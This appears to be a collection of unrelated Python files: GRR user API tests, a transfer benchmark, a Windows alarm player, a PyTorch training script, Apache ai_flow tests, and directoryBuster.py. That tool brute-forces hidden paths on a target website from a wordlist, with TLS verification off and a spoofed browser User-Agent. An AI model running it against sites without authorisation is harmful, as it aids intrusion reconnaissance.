self.assertEqual(user.data.user_type, user.USER_TYPE_ADMIN)
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertIsNone(user_obj.Get(user_obj.Schema.PASSWORD))
def testStandardUserWithPasswordIsCorrectlyAdded(self):
user = self.api.root.CreateGrrUser(username="user_foo", password="blah")
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.username, "user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertTrue(
user_obj.Get(user_obj.Schema.PASSWORD).CheckPassword("blah"))
def testUserModificationWorksCorrectly(self):
user = self.api.root.CreateGrrUser(username="user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
user = user.Modify(user_type=user.USER_TYPE_ADMIN)
self.assertEqual(user.data.user_type, user.USER_TYPE_ADMIN)
user = user.Modify(user_type=user.USER_TYPE_STANDARD)
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
def testUserPasswordCanBeModified(self):
user = self.api.root.CreateGrrUser(username="user_foo", password="blah")
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertTrue(
user_obj.Get(user_obj.Schema.PASSWORD).CheckPassword("blah"))
user = user.Modify(password="ohno")
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertTrue(
user_obj.Get(user_obj.Schema.PASSWORD).CheckPassword("ohno"))
def testUsersAreCorrectlyListed(self):
for i in range(10):
self.api.root.CreateGrrUser(username="user_%d" % i)
users = sorted(self.api.root.ListGrrUsers(), key=lambda u: u.username)
self.assertEqual(len(users), 10)
for i, u in enumerate(users):
self.assertEqual(u.username, "user_%d" % i)
self.assertEqual(u.username, u.data.username)
def testUserCanBeFetched(self):
self.api.root.CreateGrrUser(
username="user_foo", user_type=grr_api_root.GrrUser.USER_TYPE_ADMIN)
user = self.api.root.GrrUser("user_foo").Get()
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.user_type, grr_api_root.GrrUser.USER_TYPE_ADMIN)
def testUserCanBeDeleted(self):
self.api.root.CreateGrrUser(
username="user_foo", user_type=grr_api_root.GrrUser.USER_TYPE_ADMIN)
user = self.api.root.GrrUser("user_foo").Get()
user.Delete()
with self.assertRaises(grr_api_errors.ResourceNotFoundError):
self.api.root.GrrUser("user_foo").Get()
def main(argv):
del argv # Unused.
unittest.main()
def DistEntry():
"""The main entry point for packages."""
flags.StartMain(main)
if __name__ == "__main__":
flags.StartMain(main)
|
benchmark.py
|
"""
Benchmark performance of file transfer.
Copyright 2022. Andrew Wang.
"""
from typing import Callable
from time import sleep
from threading import Thread
from queue import Queue
from logging import WARNING, basicConfig
import numpy as np
from click import command, option
from send import send
from receive import receive
# pylint: disable=no-value-for-parameter
def queue_wrapper(func: Callable[..., int], que: Queue) \
-> Callable[..., None]:
"""Wrap function and put return value in queue."""
def wrapped(*args, **kwargs):
"""Put return value in queue."""
elapsed = func(*args, **kwargs)
que.put(elapsed)
return wrapped
@command()
@option('--size', '-s', type=int, required=True,
help='The number of bytes to generate.')
def benchmark(size: int):
"""Benchmark performance of file transfer."""
fname = 'random_bytes'
wait_time = .15
with open(fname, 'wb') as writer:
writer.write(np.random.bytes(size))
print(f'Wrote {fname} file with {size} bytes.')
time_queue: Queue = Queue()
basicConfig(level=WARNING)
print('Executing receiver and sender.')
receiver = Thread(target=queue_wrapper(receive, time_queue))
sender = Thread(target=queue_wrapper(send, time_queue), args=(fname,))
receiver.start()
sleep(wait_time)
sender.start()
for thread in (sender, receiver):
thread.join()
time_one: int = time_queue.get()
time_two: int = time_queue.get()
elapsed = max(time_one, time_two) - 1e9 * wait_time
print(f'Transfer time: {round(elapsed / 1e6)} ms.')
if __name__ == '__main__':
benchmark()
|
player.py
|
# coding=utf-8
'''
“闹铃”播放器。可多次调用,前后值相同不会产生影响。
唯一接口:
play(wav_filename)循环播放wav音频(不可为'default')
play('default')播放windows beep声,可以在配置文件beep.conf设置样式(出现win7没有声音的问题,但在播放音乐时有声音,也可能是声卡问题)
play('')不作变化
play(None)停止
此外还可以用win32自带系统声音:
'SystemAsterisk' Asterisk
'SystemExclamation' Exclamation
'SystemExit' Exit Windows
'SystemHand' Critical Stop
'SystemQuestion' Question
'SystemDefault'
'''
import os
import winsound
from sine.utils import ReStartableThread
from .exception import ClientException
from .globalData import data, useDefault, eManager
_list = []
def _init():
def create_beep(Hz, last):
def __func_bepp():
winsound.Beep(Hz, last)
return __func_bepp
import time
def create_sleep(last):
def __func_sleep():
time.sleep(last)
return __func_sleep
from .initUtil import warn
from sine.utils.properties import loadSingle, LineReader
# 读入beep样式信息
beep_filename = 'beep.properties'
default_pattern = [(600,50),(200,),(600,50),(300,)]
lines = []
try:
useDefault(data['location'], beep_filename)
with open(beep_filename, 'r', encoding='latin') as file:
for line in LineReader(file):
key, value = loadSingle(line)
lines.append(key + value)
except Exception as e:
warn(u'从文件 %s 读取beep样式失败,将会使用默认值。' % (beep_filename), e)
beep_pattern = default_pattern
try:
if 'beep_pattern' not in locals():
beep_pattern = []
for i, s in enumerate(lines):
array = s.split(',')
if len(array) > 1:
frequency = int(array[0].strip())
if (frequency < 37 or frequency > 32767):
raise ClientException(u'频率必须介于 37 与 32767 之间:', frequency)
duration = int(array[1].strip())
if (duration <= 0):
raise ClientException(u'持续时间必须为正:', duration)
if (duration > 2000):
raise ClientException(u'持续时间过长(大于2000毫秒):', duration)
beep_pattern.append((frequency, duration))
else:
last = int(array[0].strip())
if (last <= 0):
raise ClientException(u'间隔时间必须为正:', last)
beep_pattern.append((last,))
except Exception as e:
warn(u'读取beep样式失败,将会使用默认值。', e)
beep_pattern = default_pattern
for s in beep_pattern:
if len(s) > 1:
_list.append(create_beep(s[0], s[1]))
else:
_list.append(create_sleep(s[0] / 1000.0))
_init()
def _alarm(stop_event):
while 1:
for func in _list:
if stop_event.is_set():
return
func()
return
_name = None # 保存当前播放的内容,字符串,必然非空''
_expect = None # 静音时保存期望播放的内容
_beep = 'default'
_alarmThread = ReStartableThread(target=_alarm)
def play(name):
'''静音时保存期望播放的内容,并把参数当做None以实现停止播放'''
global _name
if not data['sound']:
_expect = name
name = None
if _name == name or name == '':
return
if _name != None: # 正在播则停止当前beep或者音乐
_alarmThread.stop(1)
winsound.PlaySound(None, winsound.SND_PURGE)
if name != None:
if name == _beep:
_alarmThread.start()
else:
# 播放wav音频,或者系统声音
if os.path.isfile(name):
winsound.PlaySound(name, winsound.SND_FILENAME | winsound.SND_ASYNC | winsound.SND_LOOP)
elif os.path.isfile(name + '.wav'):
winsound.PlaySound(name + '.wav', winsound.SND_FILENAME | winsound.SND_ASYNC | winsound.SND_LOOP)
elif name in _extraLegal:
winsound.PlaySound(name, winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP)
_name = name
return
_extraLegal = [
'',
_beep,
'SystemAsterisk',
'SystemExclamation',
'SystemExit',
'SystemHand',
'SystemQuestion',
'SystemDefault']
def isLegal(name):
'''检查音频文件是否存在或为以上合法系统值。'''
if name in _extraLegal:
return True
if os.path.isfile(name):
return True
if os.path.isfile(name + '.wav'):
return True
return False
def assertLegal(name):
if not isLegal(name):
raise ClientException(u'波形文件 \'%s\' 或者 \'%s.wav\' 不存在(也不是系统声音)。' % (name, name))
def _handleSoundChange(*args):
if data['sound']:
play(_expect)
else:
play(None)
eManager.addListener('sound.change', _handleSoundChange)
|
directoryBuster.py
|
import requests
import argparse
import threading
from urllib3.exceptions import InsecureRequestWarning
from collections import deque
from queue import Queue
class DirectoryBuster:
def __init__(self):
super().__init__()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
self.totalWords = 0
self.initialWords = 0
self.attemptCount = 0
self.directoryThreadsCount = 1
self.wordlist = None
self.foundSubdirectories = deque()
self.threadQueue = Queue()
self.parser = argparse.ArgumentParser()
self.setupArgs()
self.initiateBusting()
def setupArgs(self):
self.parser.add_argument('-dict', help='Dictionary to use')
self.parser.add_argument('-r', help='Be recursive', action='store_true')
self.parser.add_argument('-p', help='Number of parallel directories to bruteforce', default=1)
self.parser.add_argument('-t', help='Number of Threads to bust each directory', default=5)
self.parser.add_argument('-url', help='Url to bust')
self.parser.add_argument('-v', help='Show all url attempts', action='store_true')
args = self.parser.parse_args()
if (args.url is None):
print('Required url argument. Try using -url [url]')
exit()
if (args.dict is None):
print('Required dict argument. Try using -dict [dictionary]')
exit()
def initiateBusting(self):
args = self.parser.parse_args()
try:
with open(args.dict) as dictionary:
words = dictionary.readlines()
self.wordlist = words
threadLimit = int(args.t)
self.initialWords = len(words)
blockSize = self.initialWords // threadLimit
self.totalWords = self.initialWords
self.foundSubdirectories.append('/')
print('====================================')
if (not args.v):
print('Links found:')
else:
print('Links attempted:')
print('====================================')
args.url = args.url.strip()
subdirectory = self.foundSubdirectories.popleft()
self.directoryThread(words, args, subdirectory, threadLimit, blockSize)
while not self.threadQueue.empty():
self.threadQueue.get().join()
except KeyboardInterrupt:
print('\n\033[93mProgram terminated by user!')
exit()
except FileNotFoundError:
print('\033[93mDictionary file not found!')
exit()
def directoryThread(self, words, args, subdirectory, threadLimit, blockSize):
for threadNumber in range(threadLimit - 1):
lowerBound = threadNumber * blockSize
upperBound = (threadNumber + 1) * blockSize - 1
bustingThread = threading.Thread(target=self.bustingThread, args=(words[lowerBound:upperBound], args, subdirectory, False, threadLimit, blockSize))
bustingThread.daemon = True
bustingThread.start()
self.threadQueue.put(bustingThread)
bustingThread = threading.Thread(target=self.bustingThread, args=(words[(threadLimit-1)*blockSize:], args, subdirectory, True, threadLimit, blockSize))
bustingThread.daemon = True
bustingThread.start()
self.threadQueue.put(bustingThread)
def bustingThread(self, words, args, subdirectory, isLastThread, threadLimit, blockSize):
for link in words:
if (link.startswith('#')):
continue
self.attemptCount += 1
link = link.strip()
print('\u001b[37m{}/{}'.format(self.attemptCount, self.totalWords), end='\r')
dest = args.url + subdirectory + link
resp = requests.head(dest, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0'}, verify=False)
if (resp.status_code < 400 or resp.status_code >= 500):
if (resp.status_code >= 200 and resp.status_code < 300 and link != ''):
print('\033[92m{} (status code: {})'.format(dest, resp.status_code))
else:
print('\033[93m{} (status code: {})'.format(dest, resp.status_code))
if (link != '' and args.r):
newSubdirectory = '/{}/'.format(link)
if (self.directoryThreadsCount < int(args.p)):
self.directoryThreadsCount += 1
directoryThread = threading.Thread(target=self.directoryThread, args=(self.wordlist, args, newSubdirectory, threadLimit, blockSize))
directoryThread.daemon = True
directoryThread.start()
self.threadQueue.put(directoryThread)
else:
self.foundSubdirectories.append(newSubdirectory)
self.totalWords += self.initialWords
elif(args.v):
print('\033[91m{} (status code: {})'.format(dest, resp.status_code))
if (self.foundSubdirectories):
if (isLastThread):
nextSubdirectory = self.foundSubdirectories.pop()
else:
nextSubdirectory = self.foundSubdirectories[0]
self.bustingThread(words, args, nextSubdirectory, isLastThread, threadLimit, blockSize)
DirectoryBuster()
|
training.py
|
import torch
torch.manual_seed(0)
from torch import nn
import torch.multiprocessing as mp
import torch.utils.data
from torch.autograd import Variable
import numpy as np
from os import path
import os
from model import FCNSG,LRSG
from dataset import get_dataset
import pdb
import argparse
import time
from os.path import dirname, abspath, join
import glob
cur_dir = dirname(abspath(__file__))
parser = argparse.ArgumentParser()
parser.add_argument('--async', action="store", dest="asyn", type=bool, default=False,
help="Type True/False to turn on/off the async SGD. Default False")
parser.add_argument("--process", action="store", dest="process", type=int, default=4,
help="Number of processes to use if asynchronous SGD is turned on. Default 4")
parser.add_argument('--MH', action="store_true", default=False,
help="to use MinHash/feature hashing files as input. Default False")
parser.add_argument('--K', action="store", dest="K", type=int, default=1000,
help="K minhashes to use. The corresponding minhash file should be generated already. Default 1000")
parser.add_argument('--L', action="store", dest="L", type=int, default=3,
help="L layers of fully connected neural network to use. Default 3")
parser.add_argument('--dataset', action="store", dest="dataset", default="url",
help="Dataset folder to use. Default url")
parser.add_argument('--epoch', action="store", dest="epoch", type=int, default=10,
help="Number of epochs for training. Default 10")
parser.add_argument('--batch', action="store", dest="batch_size", type=int, default=1024,
help="Batch size to use. Default 1024")
parser.add_argument('--hidden', action="store", dest="hidden", type=int, default=1000,
help="hidden")
parser.add_argument('--reduced_dimension', action="store", dest="reduced_dimension", type=int, default=10000,
help="Dimension reduction by FH or MH")
parser.add_argument('--bbits', action="store", dest="bbits", type=int, default=8,
help="number of bits to store for MH")
parser.add_argument('--pairwise', action="store_true", default=False,
help="to use pairwise data / simple data. Default False")
parser.add_argument('--hashfull', action="store_true", default=False,
help="hashfull empty bins in DMH. Default False")
parser.add_argument('--use_mh_computation', action="store", default="univ",
help="univ: vectorised 4 universal, rotdense : rotation densified, orig: original")
parser.add_argument('--device', action="store", dest="device", type=int, default=0,
help="ID of GPU")
parser.add_argument('--lr', action="store", dest="lr", type=float, default=0.0001,
help="Learning rate")
parser.add_argument('--use_classwts', action="store_true", default=False,
help="Use class wts if avaiable")
parser.add_argument('--weight_decay', action="store", dest="weight_decay", type=float, default=0,
help="l2 penatly default 0")
parser.add_argument('--save_model_itr', action="store", dest="save_model_iteration", type=int, default=1000000,
help="% Iterations at which we should store the model")
parser.add_argument('--eval_model_itr', action="store", dest="eval_model_iteration", type=int, default=1000000,
help="% Iterations at which we should store the model")
parser.add_argument('--load_latest_ckpt', action="store_true", default=False,
help="load latest ckpt")
results = parser.parse_args()
# ===========================================================
# Global variables & Hyper-parameters
# ===========================================================
DATASET = results.dataset
ASYNC = results.asyn
PROCESS = results.process
MH = results.MH
D = results.reduced_dimension
K = results.K
bbits = results.bbits
L = results.L
EPOCH = results.epoch
BATCH_SIZE = results.batch_size
GPU_IN_USE = True # whether using GPU
PAIRWISE = results.pairwise
device_id = results.device
HASHFULL = results.hashfull
MHCOMPUTATION = results.use_mh_computation
LRATE = results.lr
USECLASSWT = results.use_classwts
WEIGHT_DECAY = results.weight_decay
SAVE_MODEL_ITERATION = results.save_model_iteration
LOAD_LATEST_CKPT = results.load_latest_ckpt
EVALUATE_ITR = results.eval_model_iteration
class_weights = None
HID=results.hidden
if USECLASSWT:
if DATASET == "avazu":
class_weights = torch.tensor([0.566, 4.266], dtype=torch.double)
print(DATASET, ": Using class weights", class_weights)
def train(data_files, dim, model, MHTrain, time_file=None, record_files=None, p_id=None):
# ===========================================================
# Prepare train dataset & test dataset
# ===========================================================
print("***** prepare data ******")
train, train_small, test, test_small = data_files
if record_files is not None:
acc_name, valacc_name, loss_name, valloss_name,final_prediction_name,checkpoint_name,index_name = record_files
training_set = get_dataset(train, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
train_dataloader = torch.utils.data.DataLoader(dataset=training_set, batch_size=BATCH_SIZE, shuffle=True)
validation_set = get_dataset(test, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
validation_dataloader = torch.utils.data.DataLoader(dataset=validation_set, batch_size=BATCH_SIZE, shuffle=False)
training_set_small = get_dataset(train_small, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
train_dataloader_small = torch.utils.data.DataLoader(dataset=training_set_small, batch_size=BATCH_SIZE, shuffle=True)
validation_set_small = get_dataset(test_small, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
validation_dataloader_small = torch.utils.data.DataLoader(dataset=validation_set_small, batch_size=BATCH_SIZE, shuffle=False)
print("***** prepare optimizer ******")
optimizer = torch.optim.Adam(model.parameters(), lr=LRATE, weight_decay=WEIGHT_DECAY)
#scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.1)
loss_func = nn.BCELoss(weight=class_weights).cuda(device_id) if GPU_IN_USE else nn.BCELoss(weight=class_weights)
plain_loss_func = nn.BCELoss().cuda(device_id) if GPU_IN_USE else nn.BCELoss()
epoch = 0
if LOAD_LATEST_CKPT :
files=glob.glob(checkpoint_name + "*")
if len(files) > 0:
files.sort(key=path.getmtime)
lcheckpoint_name = files[-1]
print("Loading from checkpoint", lcheckpoint_name)
checkpoint = torch.load(lcheckpoint_name)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
epoch = checkpoint['epoch']
print("Epoch:",epoch)
print("Iteration:", checkpoint["iteration"])
else:
print("CHECKPOINT NOT FOUND")
return
else:
# clear record files
for f in record_files:
if path.isfile(f):
print("removing",f)
os.remove(f)
print("***** Train ******")
acc_list, valacc_list = [], []
loss_list, valloss_list = [], []
index_list = []
training_time = 0.
while epoch < EPOCH :
# Training
for iteration, (x, y) in enumerate(train_dataloader):
if iteration % SAVE_MODEL_ITERATION == 0 and iteration > 0:
torch.save({
'epoch': epoch,
'iteration': iteration,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, checkpoint_name + ".latest")
if (epoch == 0 and iteration in [0] + [40*2**i for i in range(0, 25)]) or (epoch > 0 and iteration % EVALUATE_ITR == 0): # in epoch 0: run at log iterations and after that , run at every %20K [0, 20,K,40K etc]
index_list.append(np.array([epoch, iteration], dtype=int))
train_acc, train_loss = validation(model, train_dataloader_small, plain_loss_func, full=True)
acc_list.append(train_acc)
loss_list.append(train_loss.data)
print("*" * 50)
print('## Epoch: ', epoch, '| Iteration: ', iteration, '| total train loss: %.4f' % train_loss.data,
'| total train accuracy: %.2f' % train_acc)
valid_acc, valid_loss = validation(model, validation_dataloader, plain_loss_func, full=True, prediction_file=final_prediction_name+"_E"+str(epoch)+"_IT"+str(iteration), write=True)
valacc_list.append(valid_acc)
valloss_list.append(valid_loss)
print('## Epoch: ', epoch, '| Iteration: ', iteration, '| total validation loss: %.4f' % valid_loss,
'| total validation accuracy: %.2f' % valid_acc)
print("*" * 50)
if record_files is not None:
with open(acc_name, "ab") as f_acc_name, open(valacc_name, "ab") as f_valacc_name, open(loss_name, "ab") \
as f_loss_name, open(valloss_name, "ab") as f_valloss_name, open(index_name, "ab") as f_index_name:
np.savetxt(f_acc_name, acc_list)
np.savetxt(f_valacc_name, valacc_list)
np.savetxt(f_loss_name, loss_list)
np.savetxt(f_valloss_name, valloss_list)
np.savetxt(f_index_name, index_list, fmt="%d")
f_acc_name.close()
f_valacc_name.close()
f_loss_name.close()
f_valloss_name.close()
f_index_name.close()
acc_list = []
valacc_list = []
loss_list = []
valloss_list = []
index_list = []
start = time.clock()
model.train()
x = Variable(x).cuda(device_id) if GPU_IN_USE else Variable(x)
y = Variable(y).cuda(device_id) if GPU_IN_USE else Variable(y)
y = y.double()
output = model(x)
y = y.reshape(output.shape[0], 1)
loss = loss_func(output, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
training_time += time.clock() - start
predicted = output.data > 0.5
train_accuracy = (predicted == y.data.bool()).sum().item() / y.data.shape[0]
if iteration % 100 == 0:
print('Epoch: ', epoch, '| Iteration: ', iteration, '| batch train loss: %.4f' % loss.data,
'| batch train accuracy: %.2f' % train_accuracy)
#scheduler.step()
# Saving records
epoch = epoch + 1
torch.save({
'epoch': epoch,
'iteration': 0,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, checkpoint_name + ".latest")
valid_acc, valid_loss = validation(model, validation_dataloader, plain_loss_func, full=True, prediction_file=final_prediction_name+"_E"+str(epoch)+"_IT0", write=True)
print('Final validation loss: %.4f' % valid_loss,
'| final validation accuracy: %.2f' % valid_acc)
valacc_list.append(valid_acc)
valloss_list.append(valid_loss)
index_list.append(np.array([epoch, 0], dtype=int))
with open(acc_name, "ab") as f_acc_name, open(valacc_name, "ab") as f_valacc_name, open(loss_name, "ab") \
as f_loss_name, open(valloss_name, "ab") as f_valloss_name, open(index_name, "ab") as f_index_name:
np.savetxt(f_acc_name, acc_list)
np.savetxt(f_valacc_name, valacc_list)
np.savetxt(f_loss_name, loss_list)
np.savetxt(f_valloss_name, valloss_list)
np.savetxt(f_index_name, index_list, fmt="%d")
f_acc_name.close()
f_valacc_name.close()
f_loss_name.close()
f_valloss_name.close()
f_index_name.close()
acc_list = []
valacc_list = []
loss_list = []
valloss_list = []
index_list = []
if time_file is not None:
with open(time_file, 'a+') as outfile:
prefix = "(ASYNC, id={}) ".format(p_id) if ASYNC else ""
if MH:
outfile.write("{}K={}, L={}, epoch={} | time={}\n".format(prefix, K, L, EPOCH, training_time))
else:
outfile.write("{}Baseline, L={}, epoch={} | time={}\n".format(prefix, L, EPOCH, training_time))
def validation(model, validation_dataloader, plain_loss_func, full=False, prediction_file=None, write=False):
count = 0
total = 0.
valid_correct = 0.
total_loss = 0.
model.eval()
random_mod=np.random.randint(10)+1
if full and write:
if path.isfile(prediction_file):
print("Found prediction file present. Removing :",prediction_file)
os.remove(prediction_file)
f = open(prediction_file, "ab")
print("full operation: writing predictions to ", prediction_file)
with torch.no_grad():
for batch_id, (x_t, y_t) in enumerate(validation_dataloader):
if batch_id % random_mod==0 or full:
x_t = Variable(x_t).cuda(device_id) if GPU_IN_USE else Variable(x_t)
y_t = Variable(y_t).cuda(device_id) if GPU_IN_USE else Variable(y_t)
y_t = y_t.double()
output = model(x_t)
predicted = output.data > 0.5
y_t = y_t.reshape(output.shape[0], 1)
loss = plain_loss_func(output, y_t)
total_loss += loss
valid_correct += (predicted == y_t.data.bool()).sum().item()
total += y_t.data.shape[0]
count += 1
if full and write:
np.savetxt(f, X=output.cpu().data.numpy()[:,0], fmt="%1.6f")
f.flush()
#print("Loss", total_loss / count)
if count > 50 and (not full):
break;
if full and write:
f.close()
valid_accuracy = valid_correct / total
valid_loss = total_loss / count
return valid_accuracy, valid_loss
if __name__ == '__main__':
print("dataset={}; async={}; num_process={} ; MH={}; K={}; L={}; epoch={}; batch_size={}".format(DATASET, ASYNC, PROCESS, MH, K, L, EPOCH, BATCH_SIZE))
#########################################
print("***** prepare model ******")
if L == 0:
model = LRSG(dimension=D).double()
else:
model = FCNSG(dimension=D, num_layers=L,hidden_size=HID).double()
if GPU_IN_USE:
model.cuda(device_id)
# print(torch.cuda.device_count())
print(model)
#########################################
cfix = "D{}_hidden{}_PW{}_BS{}_LR{}_CW{}_WD{}_HF{}".format(D,HID,PAIRWISE,BATCH_SIZE,LRATE,USECLASSWT,WEIGHT_DECAY,HASHFULL)
fix = "_MH_COMP{}_K{}_{}".format(MHCOMPUTATION,K,cfix) if MH else "_FH_{}".format(cfix)
print("RUNCONFIG:", fix)
data_files = ["train.txt", "train_small_ub.txt", "test.txt", "test_small_ub.txt"]
data_dirs = list(map(lambda f: join(cur_dir, DATASET, "data", f), data_files))
print(data_files)
time_file = join(cur_dir, DATASET, "record", "time_record.txt")
if not ASYNC:
record_files = ["acc{}_L{}.txt".format(fix, L), "val_acc{}_L{}.txt".format(fix, L),
"loss{}_L{}.txt".format(fix, L), "val_loss{}_L{}.txt".format(fix, L),
"final_prediction{}_L{}.txt".format(fix, L),
"checkpoint{}_L{}.ckpt".format(fix, L),
"index{}_L{}.txt".format(fix, L)] # TODO final preduction for async
record_dirs = list(map(lambda f: join(cur_dir, DATASET, "record", f), record_files))
train(data_dirs, D, model, MH, time_file, record_dirs)
else:
mp.set_start_method('spawn')
model.share_memory()
processes = []
all_record_dirs = []
for p_id in range(PROCESS):
record_files = ["pid{}_acc{}_L{}.txt".format(p_id, fix, L), "pid{}_val_acc{}_L{}.txt".format(p_id, fix, L),
"pid{}_loss{}_L{}.txt".format(p_id, fix, L), "pid{}_val_loss{}_L{}.txt".format(p_id, fix, L)]
record_dirs = list(map(lambda f: join(cur_dir, DATASET, "record", f), record_files))
all_record_dirs.append(record_dirs)
p = mp.Process(target=train, args=(data_dirs, D, model, MH),
kwargs={"time_file": time_file, "record_files": record_dirs, "p_id": p_id})
p.start()
processes.append(p)
for p in processes:
p.join()
# File combination
acc, valacc, loss, valloss = [], [], [], []
for fnames in all_record_dirs:
acc.append(np.loadtxt(fnames[0]))
valacc.append(np.loadtxt(fnames[1]))
loss.append(np.loadtxt(fnames[2]))
valloss.append(np.loadtxt(fnames[3]))
acc = np.mean(np.array(acc), axis=0).ravel()
valacc = np.mean(np.array(valacc), axis=0).ravel()
loss = np.mean(np.array(loss), axis=0).ravel()
valloss = np.mean(np.array(valloss), axis=0).ravel()
acc_name = join(cur_dir, DATASET, "record", "[ASYNC]acc{}_L{}.txt".format(fix, L))
valacc_name = join(cur_dir, DATASET, "record", "[ASYNC]val_acc{}_L{}.txt".format(fix, L))
loss_name = join(cur_dir, DATASET, "record", "[ASYNC]loss{}_L{}.txt".format(fix, L))
valloss_name = join(cur_dir, DATASET, "record", "[ASYNC]val_loss{}_L{}.txt".format(fix, L))
np.savetxt(acc_name, acc)
np.savetxt(valacc_name, valacc)
np.savetxt(loss_name, loss)
np.savetxt(valloss_name, valloss)
|
test_workflow_event_processor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import unittest
import unittest.mock as mock
from multiprocessing import Queue, Value
import cloudpickle
from ai_flow.workflow.status import Status
from ai_flow.api.context_extractor import ContextExtractor, EventContext, Broadcast, ContextList
from ai_flow.meta.workflow_meta import WorkflowMeta
from ai_flow.scheduler_service.service.workflow_event_handler import WorkflowEventHandler
from ai_flow.scheduler_service.service.workflow_execution_event_handler_state import WorkflowContextEventHandlerState
from ai_flow.workflow.control_edge import WorkflowSchedulingRule, MeetAllEventCondition, WorkflowAction
from notification_service.base_notification import BaseEvent
from ai_flow.plugin_interface.scheduler_interface import Scheduler, WorkflowExecutionInfo
from ai_flow.store.abstract_store import AbstractStore
from ai_flow.scheduler_service.service.workflow_event_processor import WorkflowEventProcessor, Poison
class MyContextExtractor(ContextExtractor):
def extract_context(self, event: BaseEvent) -> EventContext:
if event.event_type == 'exception':
raise Exception()
if event.event_type == 'broadcast':
return Broadcast()
context_list = ContextList()
context_list.add_context(event.context)
return context_list
class TestWorkflowEventProcessor(unittest.TestCase):
def setUp(self) -> None:
self.mock_store: AbstractStore = mock.Mock()
self.mock_scheduler: Scheduler = mock.Mock()
self.mock_event_handler: WorkflowEventHandler = mock.Mock()
def mock_event_handler_factory(scheduler_rule):
return self.mock_event_handler
self.c1, self.c2 = multiprocessing.connection.Pipe()
self.processor = WorkflowEventProcessor(self.c1, self.mock_store, self.mock_scheduler,
workflow_event_handler_factory=mock_event_handler_factory)
self._prepare_workflows()
def test_run_and_stop(self):
import time
self.call_cnt = Value('i', 0)
def mock__process_event(*args, **kwargs):
self.call_cnt.value += 1
self.processor._process_event = mock__process_event
process = multiprocessing.Process(target=self.processor.run)
process.start()
event = BaseEvent('k', 'v', namespace='test_namespace')
self.c2.send(event)
time.sleep(1)
self.assertEqual(1, self.call_cnt.value)
self.c2.send(Poison())
process.join()
def test__process_event(self):
self.call_cnt = 0
def mock__handle_event_for_workflow(*args, **kwargs):
self.call_cnt += 1
self.processor._handle_event_for_workflow = mock__handle_event_for_workflow
self.processor._process_event(BaseEvent('k', 'v', namespace='test_namespace'))
self.assertEqual(3, self.call_cnt)
def _prepare_workflows(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.STOP)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
rule2 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k2', 'v2', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
w2 = WorkflowMeta('workflow2', 1, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule2])
w3 = WorkflowMeta('workflow3', 1, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule])
def mock_list_workflows(project_name):
if project_name == 'test_project1':
return [w1]
elif project_name == 'test_project2':
return [w2, w3]
else:
return None
self.mock_store.list_workflows = mock_list_workflows
self.mock_store.list_project.return_value = ['test_project1', 'test_project2']
def test__get_subscribed_workflow(self):
e = BaseEvent('k1', 'v1', namespace='test_namespace')
workflows = self.processor._get_subscribed_workflow(e, 'test_project1')
self.assertEqual(1, len(workflows))
self.assertEqual('workflow1', workflows[0].name)
e = BaseEvent('k2', 'v2', namespace='test_namespace')
workflows = self.processor._get_subscribed_workflow(e, 'test_project2')
self.assertEqual(1, len(workflows))
self.assertEqual('workflow2', workflows[0].name)
e = BaseEvent('k', 'v', namespace='test_namespace')
workflows1 = self.processor._get_subscribed_workflow(e, 'test_project1')
workflows2 = self.processor._get_subscribed_workflow(e, 'test_project2')
self.assertEqual(3, len(workflows1 + workflows2))
self.assertIn('workflow1', [workflow.name for workflow in workflows1])
self.assertIn('workflow2', [workflow.name for workflow in workflows2])
self.assertIn('workflow3', [workflow.name for workflow in workflows2])
def test__get_subscribed_workflow_without_workflow(self):
e = BaseEvent('k2', 'v2', namespace='test_namespace')
workflows = self.processor._get_subscribed_workflow(e, 'test_not_exist_project')
self.assertEqual(0, len(workflows))
def test__get_workflow_execution_state_register_state_if_not_exist(self):
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
